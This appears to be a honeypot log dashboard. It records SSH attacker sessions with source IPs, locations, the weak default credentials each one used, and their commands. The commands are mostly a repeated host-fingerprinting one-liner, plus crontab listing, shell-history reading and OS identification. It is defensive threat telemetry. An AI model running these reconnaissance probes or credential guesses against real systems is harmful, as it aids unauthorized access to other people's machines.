export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 liberty_root_19 (147.182.200.67) — Santa Clara, United States · 2 sessions · 8 cmds

2026-03-04 08:36 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 scone_root_5 (157.245.36.252) — Slough, United Kingdom · 15 sessions · 60 cmds

2026-03-04 06:29 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 15x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×15

$ uname -s -v -n -m 2 > /dev/null ×15

$ uname -m 2 > /dev/null ×15

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×15

🎭 crumpet_root_5 (143.110.160.198) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-03-04 06:31 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 yankee_root_7 (167.71.115.113) — Santa Clara, United States · 5 sessions · 40 cmds

2026-03-03 09:41 EST · as root/1234, root/admin, root/admin123

persistence setup → history snooping

$ ls -la / ×2

$ crontab -l 2>/dev/null | head -5 ×3

↳ persistence setup

$ pwd ×3

$ ps aux | head -15 ×4

$ history | tail -5 ×3

↳ history snooping

$ ssh -V

$ df -h / 2>/dev/null | tail -1 ×2

$ cat /etc/issue 2>/dev/null ×2

$ last -n 3 2>/dev/null | head -3 ×4

$ ls /dev | wc -l ×2

$ grep MemTotal /proc/meminfo 2>/dev/null

$ cat /proc/version 2>/dev/null

$ ls /opt 2>/dev/null ×2

$ grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 ×2

$ cat /etc/os-release 2>/dev/null | head -6 ×2

$ ls /var/log 2>/dev/null | wc -l ×2

$ whoami

↳ privilege check

$ mount | head -5

$ uname -a ×2

↳ OS/kernel identification

🎭 chai_sol (139.59.84.48) — Bengaluru, India · 16 sessions · 16 cmds

2026-03-04 00:47 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 phantom_root_47 (47.243.227.105) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-03-03 23:10 EST · as pi/pi

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 stein_sol (164.90.209.94) — Frankfurt am Main, Germany · 16 sessions · 16 cmds

2026-03-03 21:33 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 windmill_sol_3 (45.148.10.192) — Amsterdam, Netherlands · 33 sessions · 33 cmds

2026-02-28 13:23 EST · as sol/sol, solana/solana, validator/validator

Ran uname 66x across 66 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×33

↳ obfuscated system check

🎭 scone_root_17 (68.183.47.95) — Slough, United Kingdom · 6 sessions · 24 cmds

2026-03-03 14:52 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 sensei_root_3 (34.84.162.177) — Tokyo, Japan · 1 session · 1 cmd

2026-03-03 14:43 EST · as root/admin

ls

$ ls -la /dev/null 2>/dev/null

🎭 blitz_root_6 (164.92.254.103) — Frankfurt am Main, Germany · 9 sessions · 36 cmds

2026-03-03 14:03 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 cowboy_root_16 (67.205.149.28) — North Bergen, United States · 6 sessions · 24 cmds

2026-03-03 14:02 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 gouda_root_14 (104.248.197.4) — Amsterdam, Netherlands · 3 sessions · 12 cmds

2026-03-03 12:50 EST · as pi/raspberry, root/admin, ubuntu/ubuntu

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 tea_root_13 (209.97.136.70) — Slough, United Kingdom · 2 sessions · 8 cmds

2026-03-03 12:57 EST · as root/1234, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 ghost_root_77 (78.128.112.74) — Sopot, Bulgaria · 1 session · 1 cmd

2026-03-03 12:52 EST · as admin/admin123

echo

$ echo 'SSH check'

🎭 reef_root_5 (209.38.93.66) — Sydney, Australia · 1 session · 4 cmds

2026-03-03 12:40 EST · as root/1234

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 star_root_19 (157.245.131.138) — North Bergen, United States · 4 sessions · 16 cmds

2026-03-03 11:30 EST · as root/12345678, root/admin, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 stein_root_20 (209.38.252.191) — Frankfurt am Main, Germany · 7 sessions · 28 cmds

2026-03-03 10:37 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 spice_root_12 (139.59.25.6) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-03 10:42 EST · as root/1234, root/12345678

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 beefeater_root_7 (134.209.189.119) — Slough, United Kingdom · 11 sessions · 44 cmds

2026-03-03 09:36 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 11x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×11

$ uname -s -v -n -m 2 > /dev/null ×11

$ uname -m 2 > /dev/null ×11

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×11

🎭 monsoon_root_9 (159.89.172.237) — Bengaluru, India · 8 sessions · 32 cmds

2026-03-03 09:43 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 blitz_root_8 (161.35.210.128) — Frankfurt am Main, Germany · 10 sessions · 40 cmds

2026-03-03 09:05 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 lotus_root_15 (142.93.214.246) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-03 09:34 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

